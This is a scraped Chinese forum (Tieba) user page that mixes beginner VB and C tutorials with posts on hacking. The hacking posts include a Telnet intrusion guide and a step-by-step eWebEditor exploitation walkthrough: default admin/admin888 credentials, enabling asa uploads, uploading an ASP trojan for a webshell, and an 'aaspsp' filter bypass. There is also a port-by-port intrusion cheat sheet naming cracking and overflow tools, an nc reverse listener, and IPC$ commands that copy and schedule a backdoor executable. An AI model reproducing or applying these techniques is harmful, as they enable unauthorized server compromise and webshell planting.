人冷新0w 松鼠玛利亚
关注数: 1 粉丝数: 25 发帖数: 3,370 关注贴吧数: 19
cike技术交流 VB教程 学习VB我们不能为了学习而学习.我们要抱着喜欢,爱好VB的心态来学习VB你会发现.其实程序也是很好玩的. 对,我说的是玩VB而不是学VB .以下个人废话很多!不过请耐心看完,不要浏览,我表达能力不是很好要慢慢读才可以理解^o^ 经典的c语言教程大家听说过么,我的印象里,所谓的经典c语言教程就是.第一个教你的东西是:在屏幕上显示出”Hellow! C”我们也有样学样吧!.. 现在课程开始: 1.新建立一个exe!>> 在窗体内拖动一个命令按钮(command1)  2.双击命令按钮,>> 弹出代码框!你会看到...>> Private Sub Command1_Click() End Sub 看到了吧!如果你刚接触VB那么你可以先不用管它是什么东西你只要在这两行代码中间输入: Print "hellow! VB"  这个东西就可以了! 然后运行VB后点击那个命令按钮,你就会看到 hellow! VB 这几个字出现在窗体的左上角! 那么看来”hellow! VB”你就算会做了!真的就这样行了??当然不,我的教学绝对不同于你们的老师,这个时候你知道了VB是所谓的”面向对象的编程了么”?不一定清楚吧!那么看以下的对话! 路人甲:”〔hellow! VB〕的编程怎么做?” 路人乙:”建好一个exe后仍一个命令按钮然后双击命令按钮里面写入Print "hellow! VB"  路人甲:”具体怎么操作?” 路人乙:”怎么操作,不是说了么,就是往那个命令按钮里写代码,对这那个命令按钮操作咯.” 路人甲:”好!要的就是你最后那句对着命令按钮操作..乙很厉害啊!一说我就懂了!” 路人乙:”.....” 我还是引用上面的话吧!所谓的面对对象,这个对象简单的理解为面对控件和面对事件,这个不是书本上的观点,那里讲得比较”深奥”现在你只需要这样理解就行了,对于这个以后的详细解释你做东西多了你自然明白了.学程序不可死板的学,要举一反三和灵活运用!如果这个时候你会问:”既然有面对对象之分那么还有面对其它什么吗?”我会想这家伙脑袋灵活啊!不学习编程可惜了!转正题!其实这个我也不清楚!不过我可以告诉你关于其它的东西:传说顶顶大名的windows 其实以消息机制配合函数做出来的.简单的说windows程序原理是N多个东西里面,全都是以消息来传递,拿"hellow! VB"来说,运行上面的那个程序的时候,我们点下了命令按钮,那么就是从命令按钮那里发了一条消息给系统,系统回应命令按钮的消息,发消息给窗体,窗体收到来自系统的消息后回应,调用系统的某某函数在窗体上画上"hellow! VB"字样.我们才可以看到窗体上出现的"hellow! VB"字样.这才是这个编程的本质,其实就是消息传来传去,其复杂程度不是我们想的那么简单的.如果我们还是操作消息的话....那么就没程序员了.所以后来人们想到了新的编程方法,就是面向对象,这样我们只要管往命令按钮里写东西好了,消息如何发送就不是我们考虑的范围了...这样面对消息和面对对象的比较!你是否对所谓的 面对对象有了你的了解了呢!学习还需要有怀疑精神,不要我说什么就是什么,上面那些只是个人的看法,写出来你们参考的,当然有些地方不是很完善,我想有一天你也可以写这些,而且比我写得更好吧! 刚刚我们做了一个 "hellow! VB" 的程序,也大概了解了所谓的面向对象的编程,完了么!没完...刚刚接触VB而且英文不是很好的话...那么就算做出上面的东西那么也不知道什么回事吧!那么接下来我要说的是我自己的学习方法.理解,读懂代码,程序思路仅扣心中... 下面我翻译上面的代码,请你们记住以下单词,这是在背VB而不是英文,记得! private = 表示私有 sub =.... 暂时理解为关键字,恩!就是过程中不可少的一个元素,其他可以变它不可以! command1 = 那个命令按钮的名字 click= 单击 end =结束 print = 打印
Telnet高级入侵攻略 什么是Telnet 对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。 2.Telnet被入侵者用来做什么 (1)Telnet是控制主机的第一手段 在前几节介绍过,如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令,但相比之下,Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接,就可以像控制本地计算机一样来控制远程计算机。可见,Telnet方式是入侵者惯于使用的远程控制方式,当他们千方百计得到远程主机的管理员权限后,一般都会使用Telnet方式进行登录。 (2)用来做跳板 入侵者把用来隐身的肉鸡称之为“跳板”,他们经常用这种方法,从一个“肉鸡”登录到另一个“肉鸡”,这样在入侵过程中就不会暴露自己的IP地址,这一过程将在第5章中详细介绍。 3.关于NTLM验证 由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Telnet添加了身份验证,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外。 4.使用Telnet登录 登录命令:telnet HOST [PORT] 断开Telnet连接的命令:exit 成功地建立Telnet连接,除了要求掌握远程计算机上的账号和密码外,还需要远程计算机已经开启“Telnet服务”,并去除NTLM验证。也可以使用专门的Telnet工具来进行连接,比如STERM,CTERM等工具。 2.3.2 Telnet典型入侵 1.Telnet典型入侵步骤 步骤一:建立IPC$连接。其中sysback是前面建立的后门账号,命令如图所示。 步骤二:开启远程主机中被禁用的Telnet服务,如图所示。 步骤三:断开IPC$连接,如图所示。
cike技术交流 VB教程 学习VB我们不能为了学习而学习.我们要抱着喜欢,爱好VB的心态来学习VB你会发现.其实程序也是很好玩的. 对,我说的是玩VB而不是学VB .以下个人废话很多!不过请耐心看完,不要浏览,我表达能力不是很好要慢慢读才可以理解^o^ 经典的c语言教程大家听说过么,我的印象里,所谓的经典c语言教程就是.第一个教你的东西是:在屏幕上显示出”Hellow! C”我们也有样学样吧!.. 现在课程开始: 1.新建立一个exe!>> 在窗体内拖动一个命令按钮(command1)  2.双击命令按钮,>> 弹出代码框!你会看到...>> Private Sub Command1_Click() End Sub 看到了吧!如果你刚接触VB那么你可以先不用管它是什么东西你只要在这两行代码中间输入: Print "hellow! VB"  这个东西就可以了! 然后运行VB后点击那个命令按钮,你就会看到 hellow! VB 这几个字出现在窗体的左上角! 那么看来”hellow! VB”你就算会做了!真的就这样行了??当然不,我的教学绝对不同于你们的老师,这个时候你知道了VB是所谓的”面向对象的编程了么”?不一定清楚吧!那么看以下的对话! 路人甲:”〔hellow! VB〕的编程怎么做?” 路人乙:”建好一个exe后仍一个命令按钮然后双击命令按钮里面写入Print "hellow! VB"  路人甲:”具体怎么操作?” 路人乙:”怎么操作,不是说了么,就是往那个命令按钮里写代码,对这那个命令按钮操作咯.” 路人甲:”好!要的就是你最后那句对着命令按钮操作..乙很厉害啊!一说我就懂了!” 路人乙:”.....” 我还是引用上面的话吧!所谓的面对对象,这个对象简单的理解为面对控件和面对事件,这个不是书本上的观点,那里讲得比较”深奥”现在你只需要这样理解就行了,对于这个以后的详细解释你做东西多了你自然明白了.学程序不可死板的学,要举一反三和灵活运用!如果这个时候你会问:”既然有面对对象之分那么还有面对其它什么吗?”我会想这家伙脑袋灵活啊!不学习编程可惜了!转正题!其实这个我也不清楚!不过我可以告诉你关于其它的东西:传说顶顶大名的windows 其实以消息机制配合函数做出来的.简单的说windows程序原理是N多个东西里面,全都是以消息来传递,拿"hellow! VB"来说,运行上面的那个程序的时候,我们点下了命令按钮,那么就是从命令按钮那里发了一条消息给系统,系统回应命令按钮的消息,发消息给窗体,窗体收到来自系统的消息后回应,调用系统的某某函数在窗体上画上"hellow! VB"字样.我们才可以看到窗体上出现的"hellow! VB"字样.这才是这个编程的本质,其实就是消息传来传去,其复杂程度不是我们想的那么简单的.如果我们还是操作消息的话....那么就没程序员了.所以后来人们想到了新的编程方法,就是面向对象,这样我们只要管往命令按钮里写东西好了,消息如何发送就不是我们考虑的范围了...这样面对消息和面对对象的比较!你是否对所谓的 面对对象有了你的了解了呢!学习还需要有怀疑精神,不要我说什么就是什么,上面那些只是个人的看法,写出来你们参考的,当然有些地方不是很完善,我想有一天你也可以写这些,而且比我写得更好吧! 刚刚我们做了一个 "hellow! VB" 的程序,也大概了解了所谓的面向对象的编程,完了么!没完...刚刚接触VB而且英文不是很好的话...那么就算做出上面的东西那么也不知道什么回事吧!那么接下来我要说的是我自己的学习方法.理解,读懂代码,程序思路仅扣心中... 下面我翻译上面的代码,请你们记住以下单词,这是在背VB而不是英文,记得! private = 表示私有 sub =.... 暂时理解为关键字,恩!就是过程中不可少的一个元素,其他可以变它不可以! command1 = 那个命令按钮的名字 click= 单击 end =结束 print = 打印 路人甲,乙.....
C基础教材 C基础教材(一、C语言概述) 文章作者:evilknight 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 第一章: C语言概述 节1.1 编绎环境介绍 这里只是简单的介绍一下我们的编绎环境,关于C的历史这些,在课件里有,这个课件是我当时参加黑客X档案举办的那个C写后门与后门技术的C基础课件,我会打包一起附上来的。注:课件是以C90为基础的,我是以C99标准写的这份快速入门的 C基础教材,所以请大家注意区分。 这也是本人第一次写这类的教材,不足以及错误之处请大家火速指出,以免误导初学者,呵呵。 现在先简单的介绍一下编绎环境吧,如果是windows用户的话建议使用Dev-c++编绎器(4.9.9.2这个版本),Dev-cpp是一个GCC在win32下的IDE程序,用Dephi 5编写,只有2M,给出一个下载地址:http://milanfff.vip72.25idc.com/soft/program/devcpp-4.9.9.2_setup.exe 如果是linux平台的话直接就可以使用GCC了. 节1.2 一个简单的C语言实例 介绍了编绎环境,现在让我们来看一个简单的C程序: #include int main(void) { printf(\"Hello World.......\\n\"); return 0; } 上面就是一个简单的,很经典的一个程序入门的程序,下面我们依次对程序的每一行进行分析. #include 这行就是告诉编绎器包含文件stdio.h中的全部信息,stdio.h是所有C语言编绎包的一个标准部分,标准的输入输出(standard input/output header)。#include 可能大家还注意到了这个,在C中预处理指令(preprocessor directive)都是以# 号开头的,注意,预处理指令可不是C语言的语句哦,这个我们在以后的章节会祥细说明的。 int main(void) 可能看到这里有些人会问,怎么我看到有些人写的是void main(void)的呢,我可以很明确的告诉你,他这样写是错的,C/C++ 中从来没有定义过void main( ) 。C++ 之父 Bjarne Stroustrup 在他的主页上的 FAQ 中明确地写着 The definition void main( ) { /* ... */ } is not and never has been C++, nor has it even been C.( void main( ) 从来就不存在于 C++ 或者 C ),那他的代码为什么可以在VC6.0编绎器中通过编绎呢,因为VC6.0出生的年代以以及他对类型的检测不严格,所以导致这个错误的代码可以编绎。 C程序中包含一个或者多个函数,且必须要有一个主函数(main)也只能只有一个主函数,函数前的int型表明此函数的返回值是整型,大家也可能注意到 main括号里面的void了,这里为什么要用void呢,为什么不写int argc, char **argv呢,因为函数名后面的圆括号里一般包含传递传递给函数的信息,因为我们不用他传递任何信息,所以为空(具体的关于函数传递的细节我们在以后也会祥讲的),可能还会有人问,那不用他传递,我们直接留空就行了,在这里大家要注意一下,如果是C++的话你可以留空,如果是C的话,请写上一个 void.在C中函数名后面的圆括号为空,并不表示他不接受任何参数信息,而是表示他愿意接受一切,而C++函数后面的圆括号为空则表示不接受任何参数信息,大家有意识的区分一下。 { statement; } 在C中所有的函数都是使用花括号来表函数体的开始与结束,他们存在是必不可少的,也只能由花括号,不能由小括号,中括号取代,同时花括号还可以用来把函数中的语句聚集到一个单元或代码块中。 printf (\"Hello World.......\\n\"); 函数调用,这个是C语言的一个标准函数,圆括号表明printf是一个函数名,圆括号中包括的内容是从函数main()传递到函数printf ()的信息,程序将如何处理printf()里的参数呢?大家可能也注意到了\"Hello World.......\\n\"没错,程序就是通过识别两个双引号里面的内容.大家也可能注意到了后面有一个\\n,这个代表换行,关于\\n这些转义字符我会在讲数据类型的时候祥讲的。 return 0; 最后一个了,哎,打字打到手好累,这里return 0;的意思是返回一个0给main() 函数,操作系统通过main() 的返回值来判断程序是否结束,返回0表示程序正常结束,在大多数系统中,main的返回值是状态标识。返回值为0表明main成功执行了。其它的返回值的意义由操作系统来定义。通常非0的返回值表明发生了错误。每个操作系统都由自身的、用于告诉用户main函数返回值的途径。
eWebEditor 漏洞 eWebEditor 漏洞 各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! 漏洞利用 利用eWebEditor获得WebShell的步骤大致如下: 1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。 2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。 3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。 如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)! 4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。 然后在上传的文件类型中增加“asa”类型。 5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。 漏洞原理 漏洞的利用原理很简单,请看Upload.asp文件: 任何情况下都不允许上传asp脚本文件 sAllowExt = replace(UCase(sAllowExt), "ASP", "") 因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧! 高级应用 eWebEditor的漏洞利用还有一些技巧: 1.使用默认用户名和密码无法登录。 请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。 2.加了asa类型后发现还是无法上传。 应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的: sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "") 猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了“asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。 3.上传了asp文件后,却发现该目录没有运行脚本的权限。 呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。 4.已经使用了第2点中的方法,但是asp类型还是无法上传。 看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的“asp”删除。 后记 根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索“ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
总结各个端口的入侵 总结各个端口的入侵1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。    2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。    3. C:\>net time [url=file://127.0.0.1/]\\127.0.0.1[/url] 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。    4. C:\>at http://tieba.baidu.com/mo/q/checkurl?url=file%3A%2F%2F%5C%5C127.0.0.1&urlrefer=8937724da4adb96595b1917d51a3fde4http://tieba.baidu.com/mo/q/checkurl?url=file%3A%2F%2F%5C%5C127.0.0.1&urlrefer=8937724da4adb96595b1917d51a3fde4
首页 1 2 下一页